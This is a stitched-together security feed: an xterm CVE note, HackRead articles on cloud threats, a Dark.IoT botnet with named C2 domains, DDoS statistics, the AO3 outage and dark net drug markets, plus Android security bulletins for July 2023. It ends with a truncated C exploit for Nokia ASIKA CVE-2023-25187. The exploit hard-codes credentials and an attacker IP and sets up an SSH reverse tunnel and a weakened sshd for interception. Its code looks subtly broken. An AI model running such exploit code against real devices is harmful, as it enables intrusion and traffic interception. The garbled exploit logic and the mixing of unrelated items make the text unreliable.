xterm before 380 supports ReGIS reporting for character-set names even if they have unexpected characters (i.e., neither alphanumeric nor underscore), aka a pointer/overflow issue.

CVE-2023-40359: XTERM - Change Log

By Waqas
Cado Security Labs' 2023 Cloud Threat Findings Report dives deep into the world of cybercrime, cyberattacks, and vulnerabilities.
This is a post from HackRead.com Read the original post: SSH Remains Most Targeted Service in Cado’s Cloud Threat Report

**IN SUMMARY**

1.  **Botnet agents dominate the malware landscape, comprising 40.3% of all traffic.**
2.  **SSH remains the most targeted service, representing 68.2% of observed samples.**
3.  **A staggering 97.5% of threat actors target vulnerabilities in a single specific service.**

Cado Security, a pioneer in cloud forensics and incident response solutions, has released the much-anticipated Cado Security Labs 2023 Cloud Threat Findings Report. The report uncovers groundbreaking insights into the evolving cloud threat landscape, highlighting the escalating risk of cyberattacks in the wake of widespread cloud service adoption.

Headed by Chris Doman, CTO, and Co-Founder, of Cado Security Labs; their discoveries have exposed novel cloud-based malware and threat techniques, including the infamous Denonia, the first-known malware designed explicitly for AWS Lambda environments.

The report, which the company shared with Hackread.com, is crucial since Cado Security Labs employs honeypot infrastructure to capture real-time cloud attacker telemetry, providing timely insights into emerging attack patterns, and swiftly disseminating crucial findings throughout the security community.

As cloud technologies continue to shape the modern business landscape, organizations must grasp the depth of emerging cloud threats. Cado’s report arms the security community with the knowledge required to counter these latest threats effectively.

According to Cado’s press release, key findings from the report are as follows:

1.  Botnet agents dominate the malware landscape, comprising 40.3% of all traffic, playing a significant role in the Russia-Ukraine war’s hacktivist-driven DDoS attacks.
2.  SSH (Secure Shell Protocol) remains the most targeted service, representing 68.2% of observed samples. Redis follows at 27.6%, while the exploitation of Log4Shell vulnerability declines to a mere 4.3%.
3.  A staggering 97.5% of opportunistic threat actors target vulnerabilities in a single specific service, suggesting attackers focus on exploiting known weaknesses.

It is worth noting that last month, Nokia also released its Threat Intelligence Report for 2023. In this report, the company issued a warning about the increasing threat of DDoS attacks powered by IoT botnets, specifically targeting global Telecom networks.

Moreover, the report highlighted a concerning surge in malicious activity that was initially observed during the Russia-Ukraine conflict but has now spread to various regions worldwide.

Looking ahead, Cado Security Labs predicts an increase in serverless function attacks, non-Windows ransomware developments by ransomware groups, and the continuous exploitation of cloud services for phishing and spam campaigns.

To mitigate these impending threats, Cado Security experts advise organizations to comprehend the AWS shared responsibility model, restrict access to critical evidence, minimize exposure of services like Docker and Redis, scrutinize public repositories for cloud credentials, and implement the principle of least privilege.

Nevertheless, in an ever-evolving cyber threat landscape, the insights from the Cado Security Labs 2023 Cloud Threat Report are crucial for organizations seeking to strengthen their defences against constantly advancing cloud-focused threats.

1.  Microsoft the Most Phished Brand in Q2 2023 Report
2.  US, India China Most Targeted in DDoS Attacks, Report
3.  VirusTotal: Apps Most Exploited by Hackers to Spread Malware
4.  Russian Dark Net Markets Dominate Global Drug Trade: Report
5.  Submarine Cables Face Massive Cybersecurity Threats, Report
6.  MS Office Most Exploited Software in Malware Attacks – Report
7.  Google, Microsoft, Oracle generated most vulnerabilities in 2021

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

SSH Remains Most Targeted Service in Cado’s Cloud Threat Report

By Waqas
The DDoS attacks have been observed in various regions, including Central America, North America, East Asia, and South Asia.
This is a post from HackRead.com Read the original post: Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks

The Dark.IoT botnet is a variant based on the Mirai botnet that first surfaced in August 2021 and has since expanded its target beyond IoT devices.

In a recent report, FortiGuard Labs uncovered a concerning rise in Distributed Denial of Service **(DDoS) botnets** exploiting the Zyxel vulnerability (**CVE-2023-28771**). The vulnerability, identified with a severity rating of 9.8 on the CVSS scoring system, affects multiple firewall models and allows unauthorized attackers to execute arbitrary code by sending a specially crafted packet to the targeted device.

The Zyxel vulnerability came into the spotlight **in June 2023** when FortiGuard Labs detected the propagation of several DDoS botnets taking advantage of this security flaw. The flaw was initially reported by researchers from TRAPA Security, and Zyxel issued a **security advisory** on April 25, 2023. It was subsequently added to the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (**KEV**) catalogue in May 2023.

However, FortiGuard Labs’ recent **analysis** indicated a significant increase in attack bursts starting from May, with multiple botnets involved, including Dark.IoT, a variant based on the notorious Mirai botnet. Additionally, another botnet employed customized DDoS attack methods.

Researchers were also able to identify the attacker’s IP address, revealing that the attacks occurred in various regions, including Central America, North America, East Asia, and South Asia.

Increasing activity of the botnet (FortiGuard Labs)

The attacks specifically targeted the command injection vulnerability in the Internet Key Exchange (IKE) packet transmitted over UDP on Zyxel devices. The attackers utilized tools such as curl or wget to download scripts for further actions. These scripts were tailored for the MIPS architecture, pointing to a highly specific target.

One of the identified botnets, Dark.IoT, made its appearance **in 2021** and has since expanded its targeting beyond IoT devices.

The botnet employs the ChaCha20 cryptographic algorithm for encryption and utilizes multiple C2 (Command and Control) servers, including “raw.pastebin.com,” “hoz.1337.cx,” “babaroga.lib,” “dragon.lib,” “blacknurse.lib,” “tempest.lib,” “routercontroller.geek,” and “dvrcontroller.libre.”

The presence of exposed vulnerabilities in devices poses significant risks, as threat actors can gain control over vulnerable devices and incorporate them into their botnets for further attacks, like DDoS assaults.

FortiGuard Labs emphasizes the importance of promptly applying patches and updates to mitigate these risks and ensure the security of IoT devices and Linux servers.

In light of these findings, it is crucial for organizations and users to stay vigilant and take proactive measures to protect their systems from potential exploits. Addressing vulnerabilities promptly is essential in safeguarding against DDoS botnet attacks and other malicious activities targeting **vulnerable IoT devices**.

As cybersecurity researchers continue to monitor and analyze emerging threats, raising awareness about the importance of security updates and best practices remains vital in safeguarding the digital ecosystem.

1.  Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks
2.  DDoS Attacks Soar by 168% on Government Services, StormWall
3.  FortiGuard Labs Discovers .ZIP Domains Fueling Phishing Attacks
4.  IoT Botnet DDoS Attacks Threaten Global Telecom Networks, Nokia
5.  Chinese Gang Storm-0558 Hacked European Govt Emails, Microsoft

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks

In notification access permission dialog box, malicious application can embedded a very long service label that overflow the original user prompt and possibly contains mis-leading information to be appeared as a system message for user confirmation.



_Published July 5, 2023_

The Android Automotive OS (AAOS) Update Bulletin contains details of security vulnerabilities affecting the Android Automotive OS platform. The full AAOS update comprises the security patch level of 2023-07-05 or later from the July 2023 Android Security Bulletin in addition to all issues in this bulletin.

We encourage all customers to accept these updates to their devices.

The issue in this bulletin is a high security vulnerability in the Packages component that could allow a malicious application to embed a service label that overflow the original user prompt and possibly contain mis-leading information as a system message for user confirmation. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

**Announcements**

*   In addition to the security vulnerabilities described in the July 2023 Android Security Bulletin, the July 2023 Android Automotive OS Update Bulletin also contains patches specifically for AAOS vulnerabilities as described below.

**2023-07-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-07-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Packages**

The vulnerability in this section could allow a malicious application to embed a service label that overflow the original user prompt and possibly contain mis-leading information as a system message for user confirmation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21260

A-259384309

EoP

High

11, 12, 12L, 13

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, read the instructions on the Google device update schedule.

*   Security patch levels of 2023-07-01 or later address all issues associated with the 2023-07-01 security patch level.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-07-01\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-07-01 security patch level. Please see this article for more details on how to install security updates.

**2\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**3\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**4\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**5\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

July 5, 2023

Bulletin Published

CVE-2023-21260: Android Automotive OS Update Bulletin—July 2023

In SettingsHomepageActivity.java, there is a possible way to launch arbitrary activities via Settings due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.



_Published July 5, 2023 | Updated July 10, 2023_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2023-07-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2023-07-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-07-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could allow possible elevation of privilege due to a confused deputy with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20918

A-243794108 \[2\] \[3\]

EoP

High

11, 12, 12L, 13

CVE-2023-20942

A-258021433 \[2\] \[3\]

EoP

High

12, 12L, 13

CVE-2023-21145

A-265293293

EoP

High

11, 12, 12L, 13

CVE-2023-21245

A-222446076

EoP

High

11, 12, 12L, 13

CVE-2023-21251

A-204554636

EoP

High

11, 12, 12L, 13

CVE-2023-21254

A-254736794

EoP

High

13

CVE-2023-21257

A-257443065

EoP

High

13

CVE-2023-21262

A-279905816

EoP

High

12, 12L, 13

CVE-2023-21238

A-277740848

ID

High

11, 12, 12L, 13

CVE-2023-21239

A-274592467

ID

High

12, 12L, 13

CVE-2023-21249

A-217981062

ID

High

13

CVE-2023-21087

A-261723753

DoS

High

11, 12, 12L, 13

**System**

The most severe vulnerability in this section could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21250

A-261068592

RCE

Critical

11, 12, 12L, 13

CVE-2023-2136

A-278113033

RCE

High

13

CVE-2023-21241

A-271849189

EoP

High

11, 12, 12L, 13

CVE-2023-21246

A-273729476

EoP

High

11, 12, 12L, 13

CVE-2023-21247

A-277333781

EoP

High

12, 12L, 13

CVE-2023-21248

A-277333746

EoP

High

12, 12L, 13

CVE-2023-21256

A-268193384

EoP

High

13

CVE-2023-21261

A-271680254

ID

High

11, 12, 12L, 13

CVE-2023-20910

A-245299920 \[2\]

DoS

High

11, 12, 12L, 13

CVE-2023-21240

A-275340417

DoS

High

11, 12, 12L, 13

CVE-2023-21243

A-274445194

DoS

High

11, 12, 12L, 13

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Subcomponent

CVE

WiFi

CVE-2023-20910, CVE-2023-21240, CVE-2023-21243

**2023-07-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-07-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel**

The most severe vulnerability in this section could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Subcomponent

CVE-2022-42703

A-253167854  
Upstream kernel

EoP

High

MemoryManagement

CVE-2023-21255

A-275041864  
Upstream kernel

EoP

High

Binder

**Kernel components**

The vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Subcomponent

CVE-2023-25012

A-268589017  
Upstream kernel \[2\] \[3\] \[4\]

EoP

High

HID

**Arm components**

These vulnerabilities affect Arm components and further details are available directly from Arm. The severity assessment of these issues is provided directly by Arm.

   

CVE

References

Severity

Subcomponent

CVE-2021-29256

A-283489460\*

High

Mali

CVE-2022-28350

A-226921651\*

High

Mali

CVE-2023-28147

A-274005916 \*

High

Mali

CVE-2023-26083

A-272073598\*

Moderate

Mali

**Imagination Technologies**

This vulnerability affects Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of this issue is provided directly by Imagination Technologies.

   

CVE

References

Severity

Subcomponent

CVE-2021-0948

A-281905774\*

High

PowerVR-GPU

**MediaTek components**

These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.

   

CVE

References

Severity

Subcomponent

CVE-2023-20754

A-280380543  
M-ALPS07563028 \*

High

keyinstall

CVE-2023-20755

A-280374982  
M-ALPS07510064 \*

High

keyinstall

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Subcomponent

CVE-2023-21672

A-276751075  
QC-CR#3313322

High

Audio

CVE-2023-22386

A-276750584  
QC-CR#3355665 \[2\]

High

WLAN

CVE-2023-22387

A-276750306  
QC-CR#3356023 \[2\] \[3\] \[4\]

High

Kernel

CVE-2023-24851

A-276751076  
QC-CR#3359589 \[2\] \[3\]

High

WLAN

CVE-2023-24854

A-276750639  
QC-CR#3366343 \[2\]

High

WLAN

CVE-2023-28541

A-276750665  
QC-CR#3144133

High

WLAN

CVE-2023-28542

A-276750246  
QC-CR#3104318

High

WLAN

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Subcomponent

CVE-2023-21629

A-264414032\*

Critical

Closed-source component

CVE-2023-21631

A-264415234\*

High

Closed-source component

CVE-2023-22667

A-276750583\*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2023-07-01 or later address all issues associated with the 2023-07-01 security patch level.
*   Security patch levels of 2023-07-05 or later address all issues associated with the 2023-07-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-07-01\]
*   \[ro.build.version.security\_patch\]:\[2023-07-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-07-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2023-07-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2023-07-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

July 5, 2023

Bulletin published

1.1

July 10, 2023

Bulletin revised to include AOSP links

CVE-2023-21256: Android Security Bulletin—July 2023

By Waqas
The telecommunications sector also faced a significant onslaught in Q2 2023, becoming the second most targeted industry with an 83% YoY increase in DDoS attacks.
This is a post from HackRead.com Read the original post: DDoS Attacks Soar by 168% on Government Services, StormWall Warns

**According to StormWall’s Q2 2023 Report, the United States, India, and China remain the most heavily targeted countries, bearing the brunt of the escalating DDoS attacks.**

According to the Q2 2023 report released by global DDoS protection company StormWall, there has been a significant surge in Distributed Denial of Service **(DDoS) attacks**, with a staggering 68% increase compared to the previous year. The report unveils several key takeaways that shed light on the evolving landscape of cyber threats.

One of the most striking findings is the 136% increase in multi-vector attacks, indicating that cybercriminals are employing more sophisticated tactics to overwhelm their targets. Furthermore, StormWall observed a rise in the usage of Virtual Private Server **(VPS) botnets**, which adds to the complexity of mitigating these attacks.

Perhaps most concerning is the shift in targets towards essential services, including healthcare, financial institutions, and government agencies. StormWall’s report reveals that politically motivated attacks on the financial sector alone have experienced a staggering 110% year-over-year (YOY) increase, accounting for 26% of all attacks. This alarming trend highlights the potential consequences of cyber threats on the stability of critical financial infrastructure.

The telecommunications sector also faced a significant onslaught in Q2 2023, becoming the second most targeted industry with an 83% YoY increase in attacks. This demonstrates the growing vulnerability of communication networks and the potential disruptions to vital connectivity services.

This also confirms **Nokia’s latest finding**, which noted an increase in DDoS attacks against the telecom sector. It highlights a surge in malicious activity that was initially observed during the Russia-Ukraine conflict but has now spread to various regions globally.

Governments around the world should take immediate notice of the 168% surge in attacks on government services, which marks the highest increase across all sectors. StormWall’s report reveals that politically motivated threat actors orchestrated the majority of these incidents, indicating a scale of attacks not seen in recent months.

The transportation and healthcare sectors also experienced a worrisome increase of 137% and 126% YoY, respectively, showcasing the growing threats to crucial infrastructure.

The entertainment industry witnessed a notable spike as well, with a 72% YoY increase in attacks. Popular video streaming platforms and gaming servers were prime targets, leading to disruptions during the release of highly anticipated games such as **Diablo 4**.

While the ecommerce sector experienced a comparatively lower increase of 68%, StormWall’s report highlights that rival businesses aiming to disrupt competitors were the main driving force behind these attacks.

The logistics and education sectors accounted for 7% and 3% of the attacks, respectively. The manufacturing sector, although representing only 2% of attacks, saw an 18% YoY increase, indicating that threat actors are expanding their focus beyond the traditional target sectors.

Geographically, the United States, India, and China continue to bear the brunt of DDoS attacks. However, France has emerged as a notable addition to the list, experiencing a significant rise in attacks and becoming the fourth most targeted country.

DDoS attack by countries (StormWall)

StormWall’s Q1 2023 report, **released in April this year**, also listed India, China, and the United States as the top three countries to suffer from DDoS attacks.

StormWall’s founder and CEO, Ramil Khantimirov, expressed his concern over the escalating trend of DDoS attacks across industries. He emphasized the need for companies, especially those in essential services, to bolster their DDoS protection measures in preparation for what could be a challenging third quarter.

As cyber threats continue to evolve and grow in sophistication, organizations must prioritize robust cybersecurity strategies to safeguard their infrastructure, protect sensitive data, and ensure uninterrupted service delivery to customers and users.

1.  Significant increase in demand for stolen YouTube credentials
2.  DDoS attacks hitting BLM movement see widespread increase
3.  Vulnerable phones, IoT Devices: 400% increase in infection rate
4.  400% increase in cryptomining malware attacks against iPhones
5.  Israel Faces Fresh Wave of Cyberattacks on Critical Infrastructure

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

DDoS Attacks Soar by 168% on Government Services, StormWall Warns

By Waqas
Since early Monday morning, the AO3 website has been experiencing intermittent periods of going offline and coming back online.
This is a post from HackRead.com Read the original post: Archive of Our Own Website Suffering Massive DDoS Attacks

**Archive of Our Own disclosed that the perpetrators behind these DDoS attacks are “a collective of religiously and politically motivated hackers.”**

The popular fanfiction platform Archive of Our Own (AO3) is currently grappling with a wave of distributed denial-of-service attacks **(DDoS attacks**). Since early Monday morning, the AO3 website has been experiencing intermittent periods of going offline and coming back online, leaving users frustrated.

AO3, known for its vast collection of fan-created content across various fandoms and genres, serves as a non-profit online archive. However, this cyber attack has disrupted its services and prompted AO3 to address the situation on its official Twitter account.

The **first tweet** acknowledging the issue was posted at 1:24 PM · Jul 10, 2023 (GMT), where AO3 stated, “The Archive is experiencing some issues.” Later, at 6:38 PM · Jul 10, 2023, AO3 **confirmed** that the disruption was a result of a DDoS attack, with the tweet reading, “It looks like the Archive is under a DDoS attack causing the servers to fall over.”

AO3 went on to disclose that the perpetrators behind these DDoS attacks are “a collective of religiously and politically motivated hackers.” While their identity remains unknown, Hackread.com has reached out to AO3 for an official statement, hoping to shed light on the motives and identities of the attackers.

> A group presenting themselves as a collective of religiously and politically motivated hackers has claimed responsibility for the attack. Experts do not believe they are honest about their motivation, so we urge caution in believing any reasoning they provide for targeting AO3.
> 
> — AO3 Status (@AO3\_Status) July 10, 2023

Despite the network disruptions caused by DDoS attacks, AO3 has assured its users that their personal data remains uncompromised. The platform emphasized that users do not need to change their passwords in response to this incident.

As the situation unfolds, the AO3 community anxiously awaits further updates and hopes for a swift resolution to the ongoing DDoS attacks, ensuring uninterrupted access to their beloved fanfiction archive.

1.  AWS suffers largest ever DDoS attack of 2.3 TBPS
2.  US, India and China Most Hit in DDoS Attacks, StormWall
3.  Website used by Hong Kong protesters suffers DDoS attack
4.  IoT DDoS Attacks Threaten Global Telecom Networks, Nokia
5.  Wikipedia suffers DDoS attack causing worldwide disruption
6.  Microsoft Discloses DDoS Attack Impact with Limited Details

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Archive of Our Own Website Suffering Massive DDoS Attacks

By Habiba Rashid
The dark net, the illegal drugs, and what's next.
This is a post from HackRead.com Read the original post: Russian Dark Net Markets Dominate the Global Illicit Drug Trade: Report

**The staggering new stat show Russian-language Dark Net Markets (DNM) dominated the Illicit drug trade with over 80% of the $1.49 billion spent in 2022.**

Russian-language Dark Net Markets (DNMs) have experienced a significant surge in popularity among drug dealers and buyers, emerging as a dominant force in the global illicit drug trade, a new report suggests.

Recent data **presented** by blockchain intelligence platform TRM Labs reveals that these markets accounted for an alarming 80% of the $1.49 billion worth of illicit drugs purchased in 2022.

In order to fully understand the rise of Russian DNMs in the drug trade, one must unpack the technological advancements, socio-political factors, and evolving drug market dynamics that have contributed to their unprecedented popularity.

According to researchers, the appeal of Russian DNMs in the drug trade lies in the convenience and perceived anonymity they offer. Technological advances have made the **battle against cybercrime syndicates** all the more challenging for law enforcement, and the same encryption and anonymity tools are being used to run the dark net markets.

These underground online marketplaces allow dealers and buyers to operate covertly, challenging law enforcement investigations and arrests. The **preference for crypto transactions** and blockchain technology within DNMs has further amplified the advantage bestowed upon actors in the illicit drug trade. Loose regulations surrounding cryptocurrency payments make them an ideal tool for masking illegal exchanges.

The growing prominence of Russian-language DNMs also begs the question: how much of a free rein has the widening disconnect between the West and the Kremlin on matters of cybercrime given them?

According to BanklessTimes’ **report**, geopolitical tensions and conflicting interests have hindered collaboration, creating fertile ground for DNMs to flourish. Consequently, law enforcement agencies ability to track, apprehend, and prosecute cybercriminals has been significantly impacted.

**Impact of Russian DNM Takedown on Illicit Drug Trade**

Moreover, the shift from traditional to online markets in recent years has allowed the drug trade to flourish in the shadows of the dark net. According to the Chainanalysis **report**, four out of five of the highest-earning dark net markets in 2022 were involved in the drug trade.

Investigations and arrests that could previously be conducted within one region are now slowed by these DNMs, which provide an open market free from geographical boundaries and laws, making them highly alluring to those involved in illicit drug sales.

In April 2022, when law enforcement **shut down Hydra**, a major Russian-speaking DNM, a decline in the average daily revenue of all such markets was observed, dropping from $4.2 million before closing to $447,000 after its closure. If global efforts against Russian-language DNMs are combined, their impact would send shockwaves through the online illicit drug trade market.

**Halting Illegal Transactions**

Addressing the most nefarious darknet marketplaces starts with improved information sharing among law enforcement agencies, financial institutions, and cyber-research institutions. The global nature of the dark web makes international cooperation imperative.

During 2018 and 2019, Interpol and the European Union brought together law enforcement agencies from 19 countries, leading to the identification of 247 high-value targets and the sharing of operational intelligence required for effective enforcement.

The outcomes were promising, as these joint efforts resulted in arrests and the closure of 50 illicit dark-web platforms, including major drug markets such as the **Wall Street Market**, **Genesis**, **Alphabay**, **Hansa**, and **Valhalla**.

**RELATED ARTICLES:**

1.  Report Shows More Women Presence in Cyber Crime Forum
2.  DarkBERT: Enhancing Cybersecurity Efforts on the Dark Web
3.  179 Dark Web vendors arrested, 500kg worth of drugs seized
4.  Military Satellite Access Sold on Russian Hacker Forum for $15K
5.  IoT Botnet DDoS Attacks Threaten Global Telecom Network, Nokia
6.  Largest Dark Web Webinjects Marketplace “In The Box” Discovered

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Russian Dark Net Markets Dominate the Global Illicit Drug Trade: Report

Nokia ASIKA version 7.13.52 suffers from a hard-coded private key disclosure vulnerability.

    // Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure// Date: 2023-06-20// Exploit Author: Amirhossein Bahramizadeh// Category : Hardware// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/// Version: 7.13.52 (REQUIRED)// Tested on: Windows/Linux// CVE : CVE-2023-25187#include <stdio.h>#include <stdlib.h>#include <string.h>#include <errno.h>#include <unistd.h>#include <netinet/in.h>#include <arpa/inet.h>#include <sys/socket.h>#include <sys/types.h>#include <sys/wait.h>#include <signal.h>// The IP address of the vulnerable devicechar *host = "192.168.1.1";// The default SSH port numberint port = 22;// The username and password for the BTS service user accountchar *username = "service_user";char *password = "password123";// The IP address of the attacker's machinechar *attacker_ip = "10.0.0.1";// The port number to use for the MITM attackint attacker_port = 2222;// The maximum length of a message#define MAX_LEN 1024// Forward data between two socketsvoid forward_data(int sock1, int sock2){    char buffer[MAX_LEN];    ssize_t bytes_read;    while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)    {        write(sock2, buffer, bytes_read);    }}int main(){    int sock, pid1, pid2;    struct sockaddr_in addr;    char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};    // Create a new socket    sock = socket(AF_INET, SOCK_STREAM, 0);    // Set the address to connect to    memset(&addr, 0, sizeof(addr));    addr.sin_family = AF_INET;    addr.sin_port = htons(port);    inet_pton(AF_INET, host, &addr.sin_addr);    // Connect to the vulnerable device    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)    {        fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));        exit(1);    }    // Send the SSH handshake    write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);    read(sock, NULL, 0);    // Send the username    write(sock, username, strlen(username));    write(sock, "\r\n", 2);    read(sock, NULL, 0);    // Send the password    write(sock, password, strlen(password));    write(sock, "\r\n", 2);    // Wait for the authentication to complete    sleep(1);    // Start an SSH client on the attacker's machine    pid1 = fork();    if (pid1 == 0)    {        execv("/usr/bin/ssh", argv);        exit(0);    }    // Start an SSH server on the attacker's machine    pid2 = fork();    if (pid2 == 0)    {        execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", 